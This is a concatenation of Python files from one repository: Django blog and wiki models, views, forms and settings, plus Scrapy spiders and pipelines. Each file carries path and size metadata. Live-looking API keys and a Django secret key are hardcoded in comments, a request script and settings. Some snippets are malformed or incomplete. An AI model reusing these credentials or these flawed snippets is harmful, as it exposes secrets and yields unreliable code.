migrations.CreateModel(
name='MyModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', tinymce.models.HTMLField()),
],
),
migrations.RemoveField(
model_name='feeds',
name='content',
),
migrations.RemoveField(
model_name='feeds',
name='description',
),
]
|
Python
| 29
| 24.379311
| 114
|
/awssam/ideablog/core/migrations/0006_auto_20201114_0452.py
| 0.540761
| 0.514946
|
mrpal39/ev_code
|
refs/heads/master
|
# This script is written under the username admin, with project name Retrofm
# Change the class name AdminRetrofmSpider accordingly
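# Note (assumption): Request and self.insert_link are expected to be provided by the spider
# scaffold that the Web-UI generates around this snippet, so the fragment below is not
# runnable on its own.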
import datetime
_start_date = datetime.date(2012, 12, 25)
_initial_date = datetime.date(2012, 12, 25)
_priority = 0
start_urls = ['http://retrofm.ru']
def parse(self, response):
while AdminRetrofmSpider._start_date < self.datetime.date.today():
AdminRetrofmSpider._priority -= 1
AdminRetrofmSpider._start_date += self.datetime.timedelta(days=1)
theurlstart = 'http://retrofm.ru/index.php?go=Playlist&date=%s' % (
AdminRetrofmSpider._start_date.strftime("%d.%m.%Y"))
theurls = []
theurls.append(theurlstart + '&time_start=17%3A00&time_stop=23%3A59')
theurls.append(theurlstart + '&time_start=11%3A00&time_stop=17%3A01')
theurls.append(theurlstart + '&time_start=05%3A00&time_stop=11%3A01')
theurls.append(theurlstart + '&time_start=00%3A00&time_stop=05%3A01')
for theurl in theurls:
request = Request(theurl, method="GET",
dont_filter=True, priority=(AdminRetrofmSpider._priority), callback=self.parse)
self.insert_link(request)
|
Python
| 26
| 45.23077
| 109
|
/Web-UI/examples/link_generator.py
| 0.669442
| 0.620316
|
mrpal39/ev_code
|
refs/heads/master
|
from django import forms
#Building a search view
class SearchForm(forms.Form):
query =forms.CharField()
class uploadForm(forms.ModelForm):
images=forms.ImageField()
# # from .forms import EmailPostForm, CommentForm , SearchForm
# User Repositories='https://libraries.io/api/github/:login/repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# user=' https://libraries.io/api/github/andrew?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# Repository=' https://libraries.io/api/github/:owner/:name?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# =' https://libraries.io/api/github/gruntjs/grunt/projects?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# ProjectSearch=' https://libraries.io/api/search?q=grunt&api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# Platforms= ' GET https://libraries.io/api/platforms?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# https://libraries.io/api/NPM/base62?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# ProjectDependen https://libraries.io/api/:platform/:name/:version/dependencies?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# ' https://libraries.io/api/NPM/base62/2.0.1/dependencies?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# DependentReposito= https://libraries.io/api/NPM/base62/dependent_repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# ProjectContributo= https://libraries.io/api/NPM/base62/contributors?api_key=306cf1684a42e4be5ec0a1c60362c2ef '
# ProjectSourceRank='https://libraries.io/api/NPM/base62/sourcerank?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
|
Python
| 30
| 51.833332
| 125
|
/myapi/devfile/core/forms.py
| 0.768939
| 0.616793
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
# Return None if there is no next-page URL
list_first_item = lambda x:x[0] if x else None
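# Usage sketch (illustrative): list_first_item(['a', 'b']) -> 'a'; list_first_item([]) -> None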
|
Python
| 4
| 21.75
| 46
|
/tc_zufang/tc_zufang-slave/tc_zufang/utils/result_parse.py
| 0.659341
| 0.637363
|
mrpal39/ev_code
|
refs/heads/master
|
from django import forms
from core.models import Comment
#Building a search view
class SearchForm(forms.Form):
query =forms.CharField()
class EmailPostForm(forms.Form):
name = forms.CharField(max_length=25)
email = forms.EmailField()
to = forms.EmailField()
comments = forms.CharField(required=False,
widget=forms.Textarea)
class CommentForm(forms.ModelForm):
url = forms.URLField(label='URL', required=False)
email = forms.EmailField(label='Email', required=True)
name = forms.CharField(
label='Name',
widget=forms.TextInput(
attrs={
'value': "",
'size': "30",
'maxlength': "245",
'aria-required': 'true'}))
parent_comment_id = forms.IntegerField(
widget=forms.HiddenInput, required=False)
class Meta:
model = Comment
fields = ['body']
|
Python
| 35
| 25.542856
| 57
|
/myapi/fullfeblog/blog/forms.py
| 0.59375
| 0.586207
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
# Create your views here.
import json
from django.http import JsonResponse
from django_blog.util import PageInfo
from blog.models import Article, Comment
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import render, get_object_or_404
def get_page(request):
page_number = request.GET.get("page")
return 1 if not page_number or not page_number.isdigit() else int(page_number)
def index(request):
_blog_list = Article.objects.all().order_by('-date_time')[0:5]
_blog_hot = Article.objects.all().order_by('-view')[0:6]
return render(request, 'blog/index.html', {"blog_list": _blog_list, "blog_hot": _blog_hot})
def blog_list(request):
"""
列表
:param request:
:return:
"""
page_number = get_page(request)
blog_count = Article.objects.count()
page_info = PageInfo(page_number, blog_count)
_blog_list = Article.objects.all()[page_info.index_start: page_info.index_end]
return render(request, 'blog/list.html', {"blog_list": _blog_list, "page_info": page_info})
def category(request, name):
"""
分类
:param request:
:param name:
:return:
"""
page_number = get_page(request)
blog_count = Article.objects.filter(category__name=name).count()
page_info = PageInfo(page_number, blog_count)
_blog_list = Article.objects.filter(category__name=name)[page_info.index_start: page_info.index_end]
return render(request, 'blog/category.html', {"blog_list": _blog_list, "page_info": page_info,
"category": name})
def tag(request, name):
"""
标签
:param request:
:param name
:return:
"""
page_number = get_page(request)
blog_count = Article.objects.filter(tag__tag_name=name).count()
page_info = PageInfo(page_number, blog_count)
_blog_list = Article.objects.filter(tag__tag_name=name)[page_info.index_start: page_info.index_end]
return render(request, 'blog/tag.html', {"blog_list": _blog_list,
"tag": name,
"page_info": page_info})
def archive(request):
"""
文章归档
:param request:
:return:
"""
_blog_list = Article.objects.values("id", "title", "date_time").order_by('-date_time')
archive_dict = {}
for blog in _blog_list:
pub_month = blog.get("date_time").strftime("%Y年%m月")
if pub_month in archive_dict:
archive_dict[pub_month].append(blog)
else:
archive_dict[pub_month] = [blog]
data = sorted([{"date": _[0], "blogs": _[1]} for _ in archive_dict.items()], key=lambda item: item["date"],
reverse=True)
return render(request, 'blog/archive.html', {"data": data})
def message(request):
return render(request, 'blog/message_board.html', {"source_id": "message"})
@csrf_exempt
def get_comment(request):
"""
接收畅言的评论回推, post方式回推
:param request:
:return:
"""
arg = request.POST
data = arg.get('data')
data = json.loads(data)
title = data.get('title')
url = data.get('url')
source_id = data.get('sourceid')
if source_id not in ['message']:
article = Article.objects.get(pk=source_id)
article.commenced()
comments = data.get('comments')[0]
content = comments.get('content')
user = comments.get('user').get('nickname')
Comment(title=title, source_id=source_id, user_name=user, url=url, comment=content).save()
return JsonResponse({"status": "ok"})
def detail(request, pk):
"""
博文详情
:param request:
:param pk:
:return:
"""
blog = get_object_or_404(Article, pk=pk)
blog.viewed()
return render(request, 'blog/detail.html', {"blog": blog})
def search(request):
"""
搜索
:param request:
:return:
"""
key = request.GET['key']
page_number = get_page(request)
blog_count = Article.objects.filter(title__icontains=key).count()
page_info = PageInfo(page_number, blog_count)
_blog_list = Article.objects.filter(title__icontains=key)[page_info.index_start: page_info.index_end]
return render(request, 'blog/search.html', {"blog_list": _blog_list, "pages": page_info, "key": key})
def page_not_found_error(request, exception):
return render(request, "404.html", status=404)
def page_error(request):
return render(request, "404.html", status=500)
|
Python
| 144
| 29.847221
| 111
|
/awssam/django-blog/src/blog/views.py
| 0.61819
| 0.612112
|
mrpal39/ev_code
|
refs/heads/master
|
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
from django.urls import reverse
import logging
from abc import ABCMeta, abstractmethod, abstractproperty
from django.db import models
from django.urls import reverse
from django.conf import settings
from uuslug import slugify
from django.core.exceptions import ValidationError
from django.utils.translation import gettext_lazy as _
from webdev.utils import get_current_site
from webdev.utils import cache_decorator, cache
from django.utils.timezone import now
from mdeditor.fields import MDTextField
#
logger = logging.getLogger(__name__)
class LinkShowType(models.TextChoices):
I = ('i', 'Homepage')
L = ('l', 'List page')
P = ('p', 'Article page')
A = ('a', 'Whole site')
S = ('s', 'Friendly Link Page')
class BaseModel(models.Model):
id = models.AutoField(primary_key=True)
created_time = models.DateTimeField('Creation Time', default=now)
last_mod_time = models.DateTimeField('Modification time', default=now)
def save(self, *args, **kwargs):
is_update_views = isinstance(
self,
Article) and 'update_fields' in kwargs and kwargs['update_fields'] == ['views']
if is_update_views:
Article.objects.filter(pk=self.pk).update(views=self.views)
else:
if 'slug' in self.__dict__:
slug = getattr(
self, 'title') if 'title' in self.__dict__ else getattr(
self, 'name')
setattr(self, 'slug', slugify(slug))
super().save(*args, **kwargs)
def get_full_url(self):
site = get_current_site().domain
url = "https://{site}{path}".format(site=site,
path=self.get_absolute_url())
return url
class Meta:
abstract = True
@abstractmethod
def get_absolute_url(self):
pass
class Article(BaseModel):
"""文章"""
STATUS_CHOICES = (
('d', 'draft'),
('p', 'publish'),
)
COMMENT_STATUS = (
('o', 'open'),
('c', 'close'),
)
TYPE = (
('a', 'article'),
('p', 'page'),
)
title = models.CharField('title', max_length=200, unique=True)
body = MDTextField('body')
pub_time = models.DateTimeField(
'Release time', blank=False, null=False, default=now)
status = models.CharField(
'Article status',
max_length=1,
choices=STATUS_CHOICES,
default='p')
comment_status = models.CharField(
'Comment Status',
max_length=1,
choices=COMMENT_STATUS,
default='o')
type = models.CharField('Type', max_length=1, choices=TYPE, default='a')
views = models.PositiveIntegerField('Views', default=0)
author = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name='Author',
blank=False,
null=False,
on_delete=models.CASCADE)
article_order = models.IntegerField(
'Sorting: the larger the number, the higher it ranks', blank=False, null=False, default=0)
category = models.ForeignKey(
'Category',
verbose_name='Classification',
on_delete=models.CASCADE,
blank=False,
null=False)
tags = models.ManyToManyField('Tag', verbose_name='tag collection', blank=True)
def body_to_string(self):
return self.body
def __str__(self):
return self.title
class Meta:
ordering = ['-article_order', '-pub_time']
verbose_name = "article"
verbose_name_plural = verbose_name
get_latest_by = 'id'
def get_absolute_url(self):
return reverse('blog:detailbyid', kwargs={
'article_id': self.id,
'year': self.created_time.year,
'month': self.created_time.month,
'day': self.created_time.day
})
@cache_decorator(60 * 60 * 10)
def get_category_tree(self):
tree = self.category.get_category_tree()
names = list(map(lambda c: (c.name, c.get_absolute_url()), tree))
return names
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
def viewed(self):
self.views += 1
self.save(update_fields=['views'])
def comment_list(self):
cache_key = 'article_comments_{id}'.format(id=self.id)
value = cache.get(cache_key)
if value:
logger.info('get article comments:{id}'.format(id=self.id))
return value
else:
comments = self.comment_set.filter(is_enable=True)
cache.set(cache_key, comments, 60 * 100)
logger.info('set article comments:{id}'.format(id=self.id))
return comments
def get_admin_url(self):
info = (self._meta.app_label, self._meta.model_name)
return reverse('admin:%s_%s_change' % info, args=(self.pk,))
@cache_decorator(expiration=60 * 100)
def next_article(self):
# Next article
return Article.objects.filter(
id__gt=self.id, status='p').order_by('id').first()
@cache_decorator(expiration=60 * 100)
def prev_article(self):
# Previous article
return Article.objects.filter(id__lt=self.id, status='p').first()
class Category(BaseModel):
"""Article Classification"""
name = models.CharField('Category name', max_length=30, unique=True)
parent_category = models.ForeignKey(
'self',
verbose_name="Parent Category",
blank=True,
null=True,
on_delete=models.CASCADE)
slug = models.SlugField(default='no-slug', max_length=60, blank=True)
class Meta:
ordering = ['name']
verbose_name = "Category"
verbose_name_plural = verbose_name
def get_absolute_url(self):
return reverse(
'blog:category_detail', kwargs={
'category_name': self.slug})
def __str__(self):
return self.name
@cache_decorator(60 * 60 * 10)
def get_category_tree(self):
"""
递归获得分类目录的父级
:return:
"""
categorys = []
def parse(category):
categorys.append(category)
if category.parent_category:
parse(category.parent_category)
parse(self)
return categorys
@cache_decorator(60 * 60 * 10)
def get_sub_categorys(self):
"""
获得当前分类目录所有子集
:return:
"""
categorys = []
all_categorys = Category.objects.all()
def parse(category):
if category not in categorys:
categorys.append(category)
childs = all_categorys.filter(parent_category=category)
for child in childs:
if category not in categorys:
categorys.append(child)
parse(child)
parse(self)
return categorys
class Tag(BaseModel):
"""Article Tags"""
name = models.CharField('Tag name', max_length=30, unique=True)
slug = models.SlugField(default='no-slug', max_length=60, blank=True)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('blog:tag_detail', kwargs={'tag_name': self.slug})
@cache_decorator(60 * 60 * 10)
def get_article_count(self):
return Article.objects.filter(tags__name=self.name).distinct().count()
class Meta:
ordering = ['name']
verbose_name = "label"
verbose_name_plural = verbose_name
class Links(models.Model):
"""Links"""
name = models.CharField('Link name', max_length=30, unique=True)
link = models.URLField('Link address')
sequence = models.IntegerField('Sort order', unique=True)
is_enable = models.BooleanField(
'Whether to display', default=True, blank=False, null=False)
show_type = models.CharField(
'Display Type',
max_length=1,
choices=LinkShowType.choices,
default=LinkShowType.I)
created_time = models.DateTimeField('Creation Time', default=now)
last_mod_time = models.DateTimeField('Modification time', default=now)
class Meta:
ordering = ['sequence']
verbose_name = 'Friendly link'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class SideBar(models.Model):
"""The sidebar can display some html content"""
name = models.CharField('Title', max_length=100)
content = models.TextField("Content")
sequence = models.IntegerField('Sort order', unique=True)
is_enable = models.BooleanField('Whether to enable', default=True)
created_time = models.DateTimeField('Creation Time', default=now)
last_mod_time = models.DateTimeField('Modification time', default=now)
class Meta:
ordering = ['sequence']
verbose_name = 'Sidebar'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class BlogSettings(models.Model):
'''Site Settings'''
sitename = models.CharField(
"Site Name",
max_length=200,
null=False,
blank=False,
default='')
site_description = models.TextField(
"Site Description",
max_length=1000,
null=False,
blank=False,
default='')
site_seo_description = models.TextField(
"SEO description of the site", max_length=1000, null=False, blank=False, default='')
site_keywords = models.TextField(
"Website Keywords",
max_length=1000,
null=False,
blank=False,
default='')
article_sub_length = models.IntegerField("Article summary length", default=300)
sidebar_article_count = models.IntegerField("The number of sidebar articles", default=10)
sidebar_comment_count = models.IntegerField("The number of sidebar comments", default=5)
show_google_adsense = models.BooleanField('Whether to display Google ads', default=False)
google_adsense_codes = models.TextField(
'Ad content', max_length=2000, null=True, blank=True, default='')
open_site_comment = models.BooleanField('Whether to open website comment function', default=True)
beiancode = models.CharField(
'Record number',
max_length=2000,
null=True,
blank=True,
default='')
analyticscode = models.TextField(
"Website Statistics Code",
max_length=1000,
null=False,
blank=False,
default='')
show_gongan_code = models.BooleanField(
'Whether to display the public security record number', default=False, null=False)
gongan_beiancode = models.TextField(
'Public Security Record Number',
max_length=2000,
null=True,
blank=True,
default='')
resource_path = models.CharField(
"Static file storage address",
max_length=300,
null=False,
default='/var/www/resource/')
class Meta:
verbose_name = 'Website configuration'
verbose_name_plural = verbose_name
def __str__(self):
return self.sitename
def clean(self):
if BlogSettings.objects.exclude(id=self.id).count():
raise ValidationError(_('There can only be one configuration'))
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
from webdev.utils import cache
cache.clear()
class PublishedManager(models.Manager):
def get_queryset(self):
return super(PublishedManager,
self).get_queryset()\
.filter(status='published')
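# Usage sketch (illustrative): Post.published.all() returns only rows with status='published',
# while the default Post.objects.all() returns every row.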
class Post(models.Model):
tags = TaggableManager()
objects = models.Manager() # The default manager.
published = PublishedManager() # Our custom manager.
STATUS_CHOICES = (
('draft', 'Draft'),
('published', 'Published'),
)
title = models.CharField(max_length=250)
slug = models.SlugField(max_length=250,
unique_for_date='publish')
author = models.ForeignKey(User,
on_delete=models.CASCADE,
related_name='blog_posts')
body = models.TextField()
publish = models.DateTimeField(default=timezone.now)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
status = models.CharField(max_length=10,
choices=STATUS_CHOICES,
default='draft')
class Meta:
ordering = ('-publish',)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('post-detail', kwargs={'pk': self.pk})
|
Python
| 407
| 32.624077
| 112
|
/myapi/fullfeblog/blog/models.py
| 0.559664
| 0.551626
|
mrpal39/ev_code
|
refs/heads/master
|
import os
from django.urls import reverse_lazy
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'vsfygxju9)=k8qxmc9!__ng%dooyn-w7il_z+w)grvkz4ks!)u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.humanize.apps.HumanizeConfig",
"django.contrib.auth.apps.AuthConfig",
"django.contrib.contenttypes.apps.ContentTypesConfig",
"django.contrib.sessions.apps.SessionsConfig",
"django.contrib.sites.apps.SitesConfig",
"django.contrib.messages.apps.MessagesConfig",
"django.contrib.staticfiles.apps.StaticFilesConfig",
"django.contrib.admin.apps.AdminConfig",
"django.contrib.admindocs.apps.AdminDocsConfig",
"sekizai",
"sorl.thumbnail",
"django_nyt.apps.DjangoNytConfig",
"wiki.apps.WikiConfig",
"wiki.plugins.macros.apps.MacrosConfig",
"wiki.plugins.help.apps.HelpConfig",
"wiki.plugins.links.apps.LinksConfig",
"wiki.plugins.images.apps.ImagesConfig",
"wiki.plugins.attachments.apps.AttachmentsConfig",
"wiki.plugins.notifications.apps.NotificationsConfig",
"wiki.plugins.editsection.apps.EditSectionConfig",
"wiki.plugins.globalhistory.apps.GlobalHistoryConfig",
"mptt",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
]
SITE_ID=1
ROOT_URLCONF = 'wikidj.urls'
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [
os.path.join(BASE_DIR, "templates"),
],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.debug",
"django.template.context_processors.i18n",
"django.template.context_processors.request",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"sekizai.context_processors.sekizai",
],
"debug": DEBUG,
},
},
]
WSGI_APPLICATION = 'wikidj.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(BASE_DIR, "static")
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
MEDIA_URL = "/media/"
WIKI_ANONYMOUS_WRITE = True
WIKI_ANONYMOUS_CREATE = False
LOGIN_REDIRECT_URL = reverse_lazy('wiki:get', kwargs={'path': ''})
# urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
Python
| 140
| 27.185715
| 91
|
/awssam/wikidj/wikidj/settings.py
| 0.68145
| 0.676635
|
mrpal39/ev_code
|
refs/heads/master
|
from django.db import models
from blog.models import Post
# Creating a comment systems
class Comment(models.Model):
post = models.ForeignKey(Post,
on_delete=models.CASCADE,
related_name='comments')
name=models.CharField(max_length=200)
email=models.EmailField()
body=models.TextField()
created=models.DateTimeField(auto_now_add=True)
updated=models.DateTimeField(auto_now_add=True)
active=models.BooleanField(default=True)
class Meta:
ordering=('created',)
def __str__(self):
return f'Comment by {self.name} on {self.post}'
|
Python
| 19
| 31.31579
| 53
|
/awssam/fullfeblog/core/models.py
| 0.661316
| 0.656501
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from mongoengine import *
from django.db import models
# Create your models here.
class ItemInfo(Document):
# Listing title
title = StringField()
# Rent
money = StringField()
# Rental method
method = StringField()
# District
area = StringField()
# Residential community
community = StringField()
# Detail page URL
targeturl = StringField()
# Publish time
pub_time = StringField()
# City
city = StringField()
phone = StringField()
img1 = StringField()
img2 = StringField()
# MongoDB collection to store these documents in
meta={'collection':'zufang_detail'}
|
Python
| 28
| 20.785715
| 39
|
/tc_zufang/django_web/datashow/models.py
| 0.619672
| 0.614754
|
mrpal39/ev_code
|
refs/heads/master
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.api, name='api'),
path('t/', views.simple_upload, name='test'),
]
|
Python
| 10
| 15.2
| 49
|
/myapi/devfile/gitapi/urls.py
| 0.611111
| 0.611111
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
# Define the fields to scrape and store in the database
from scrapy.item import Item,Field
class TcZufangItem(Item):
# Listing title
title=Field()
# Rent
money=Field()
# Rental method
method=Field()
# District
area=Field()
# Residential community
community=Field()
# Detail page URL
targeturl=Field()
# Publish time
pub_time=Field()
# City
city=Field()
# Contact phone
phone= Field()
# Image 1
img1 = Field()
# Image 2
img2 = Field()
|
Python
| 26
| 15.384615
| 34
|
/tc_zufang/tc_zufang-slave/tc_zufang/items.py
| 0.550117
| 0.538462
|
mrpal39/ev_code
|
refs/heads/master
|
from scrapy.loader.processors import MapCompose, Join
from scrapy.loader import ItemLoader
from properties.items import PropertiesItem
import datetime
from urllib.parse import urlparse
import socket
import scrapy
class BasicSpider(scrapy.Spider):
name = "basictest"
allowed_domains = ["web"]
start_urls=(
'https://developers.facebook.com/blog/post/2021/01/26/introducing-instagram-content-publishing-api/?utm_source=email&utm_medium=fb4d-newsletter-february21&utm_campaign=organic&utm_offering=business-tools&utm_product=instagram&utm_content=body-button-instagram-graph-API&utm_location=2',
)
def parse(self, response):
""" @url https://developers.facebook.com/blog/post/2021/01/26/introducing-instagram-content-publishing-api/?utm_source=email&utm_medium=fb4d-newsletter-february21&utm_campaign=organic&utm_offering=business-tools&utm_product=instagram&utm_content=body-button-instagram-graph-API&utm_location=2
@returns item 1
@scrapes title price
@scrapes url project"""
l = ItemLoader(item=PropertiesItem(), response=response)
# Load fields using XPath expressions
l.add_xpath('title', '/html/body/div[1]/div[5]/div[2]/div/div/div/div[2]/div[2]/div[2]/div[1]/div/div/div[2]/div/div/p[1]/text()',
MapCompose(str.strip, str.title))
# l.add_xpath('price', './/*[@itemprop="price"][1]/text()',
# MapCompose(lambda i: i.replace(',', ''),
# float),
# re='[,.0-9]+')
# l.add_xpath('description', '//*[@itemprop="description"]'
# '[1]/text()',
# MapCompose(unicode.strip), Join())
# Housekeeping fields
l.add_value('url', response.url)
l.add_value('project', self.settings.get('BOT_NAME'))
l.add_value('spider', self.name)
l.add_value('server', socket.gethostname())
l.add_value('date', datetime.datetime.now())
return l.load_item()
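# Note (illustrative): the docstring above uses Scrapy spider contracts (@url / @returns /
# @scrapes), which can be exercised with `scrapy check basictest` from the project directory.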
|
Python
| 42
| 44.023811
| 299
|
/scrap/properties/properties/spiders/basictest.py
| 0.690476
| 0.67037
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import logging
# import MySQLdb
# import MySQLdb.cursors
import copy
import pymysql
from twisted.enterprise import adbapi
# class ArticlesPipeline(object):
# def process_item(self, item, spider):
# return item
class MysqlTwistedPipeline(object):
def __init__(self, dbpool):
self.dbpool = dbpool
@classmethod
def from_settings(cls, settings): # fixed name; called by Scrapy with the settings object
"""
Set up the database connection pool.
:param settings: Scrapy settings
:return: pipeline instance
"""
adbparams = dict(
host=settings['MYSQL_HOST'],
db=settings['MYSQL_DBNAME'],
user=settings['MYSQL_USER'],
password=settings['MYSQL_PASSWORD'],
cursorclass=pymysql.cursors.DictCursor # use a dict-based cursor
)
# Build the connection pool; pymysql or MySQLdb can be used as the driver
dbpool = adbapi.ConnectionPool('pymysql', **adbparams)
# Return the pipeline instance
return cls(dbpool)
def process_item(self, item, spider):
"""
Use twisted to run the MySQL insert asynchronously through the connection pool.
"""
# Deep-copy the item to avoid duplicated data when inserts lag behind scraping
item = copy.deepcopy(item)
query = self.dbpool.runInteraction(self.do_insert, item) # the method to run and its data
# Attach error handling (addErrback so handle_error receives failures, not successes)
query.addErrback(self.handle_error)
return item
def do_insert(self, cursor, item):
# Run the insert; no explicit commit is needed, twisted commits automatically
insert_sql = """
insert into pm_article(title, create_date, url, content, view, tag, url_id) VALUES (%s, %s, %s, %s, %s, %s, %s)
"""
cursor.execute(insert_sql, (item['title'], item['create_date'], item['url'],
item['content'], item['view'], item['tag'], item['url_id']))
def handle_error(self, failure):
if failure:
# Print the error
print(failure)
class ElasticsearchPipeline(object):
# Write the data into Elasticsearch
def process_item(self, item, spider):
# Convert the item into an ES document and save it
item.save_to_es()
return item
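# Enabling sketch (assumption: the dotted paths and priorities are illustrative, based on this
# file living in the `articles` project):
# ITEM_PIPELINES = {
#     'articles.pipelines.MysqlTwistedPipeline': 300,
#     'articles.pipelines.ElasticsearchPipeline': 400,
# }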
|
Python
| 75
| 27.933332
| 117
|
/eswork/articles/articles/pipelines.py
| 0.605069
| 0.604608
|
mrpal39/ev_code
|
refs/heads/master
|
# import requests
# url = "https://proxy-orbit1.p.rapidapi.com/v1/"
# headers = {
# 'x-rapidapi-key': "b188eee73cmsha4c027c9ee4e2b7p1755ebjsn1e0e0b615bcf",
# 'x-rapidapi-host': "proxy-orbit1.p.rapidapi.com"
# }
# # response = requests.request("GET", url, headers=headers)
# print(response.text)
import requests
url= "https://libraries.io/api/"
headers={'?api_key':'306cf1684a42e4be5ec0a1c60362c2ef',
# 'platform':'NPM/base62/dependent_repositories'
}
response = requests.request("GET", url, headers=headers)
print(response.text)
# Example: https://libraries.io/api/NPM/base62/dependent_repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef
import requests
url = "https://scrapingant.p.rapidapi.com/post"
payload = "{\"cookies\": \"cookie_name_1=cookie_value_1;cookie_name_2=cookie_value_2\"\"return_text\": false,\"url\": \"https://example.com\"}"
headers = {
'content-type': "application/json",
'x-rapidapi-key': "b188eee73cmsha4c027c9ee4e2b7p1755ebjsn1e0e0b615bcf",
'x-rapidapi-host': "scrapingant.p.rapidapi.com"
}
response = requests.request("POST", url, data=payload, headers=headers)
print(response.text)
|
Python
| 47
| 23.659575
| 143
|
/myapi/devfile/request/api.py
| 0.714901
| 0.633075
|
mrpal39/ev_code
|
refs/heads/master
|
from django.urls import path
from . import views
from django.conf.urls import include, url
from django.views import generic
from material.frontend import urls as frontend_urls
urlpatterns = [
path('', views.home, name='home'),
path('$/', generic.RedirectView.as_view(url='/workflow/', permanent=False)),
path('/', include(frontend_urls)),
]
# Viewflow PRO Feature Set
# Celery integration
# django-guardian integration
# Flow graph visualization
# Flow BPMN export
# Material Frontend
# Process dashboard view
# Flow migration support
# Subprocess support
# REST API support
|
Python
| 25
| 24.440001
| 80
|
/awssam/devfile/core/urls.py
| 0.690738
| 0.690738
|
mrpal39/ev_code
|
refs/heads/master
|
# You need to create an Item name 'played' for running this script
# item['ack_signal'] = int(response.meta['ack_signal']) - this line is used for sending ack signal to RabbitMQ
def parse(self, response):
item = played()
songs = response.xpath('//li[@class="player-in-playlist-holder"]')
indexr = response.url.find('date=')
indexr = indexr + 5
date = response.url[indexr:indexr + 10]
for song in songs:
item['timeplayed'] = song.xpath('.//span[@class="time"]/text()').extract()[0]
item['artist'] = song.xpath('.//div[@class="jp-title"]/strong//span//text()').extract()[0]
item['song'] = song.xpath('.//div[@class="jp-title"]/strong//em//text()').extract()[0]
item['dateplayed'] = date
item['ack_signal'] = int(response.meta['ack_signal'])
yield item
|
Python
| 16
| 50.4375
| 110
|
/Web-UI/examples/scraper.py
| 0.619221
| 0.611922
|
mrpal39/ev_code
|
refs/heads/master
|
# from __future__ import unicode_literals
# from django.utils.encoding import python_2_unicode_compatible
# from django.db import models
# from django.db.models.signals import pre_delete
# from django.dispatch import receiver
# from scrapy_djangoitem import DjangoItem
# from dynamic_scraper.models import Scraper, SchedulerRuntime
# @python_2_unicode_compatible
# class NewsWebsite(models.Model):
# name = models.CharField(max_length=200)
# url = models.URLField()
# scraper = models.ForeignKey(Scraper, blank=True, null=True, on_delete=models.SET_NULL)
# scraper_runtime = models.ForeignKey(SchedulerRuntime, blank=True, null=True, on_delete=models.SET_NULL)
# def __str__(self):
# return self.name
# @python_2_unicode_compatible
# class Article(models.Model):
# title = models.CharField(max_length=200)
# news_website = models.ForeignKey(NewsWebsite)
# description = models.TextField(blank=True)
# url = models.URLField(blank=True)
# thumbnail = models.CharField(max_length=200, blank=True)
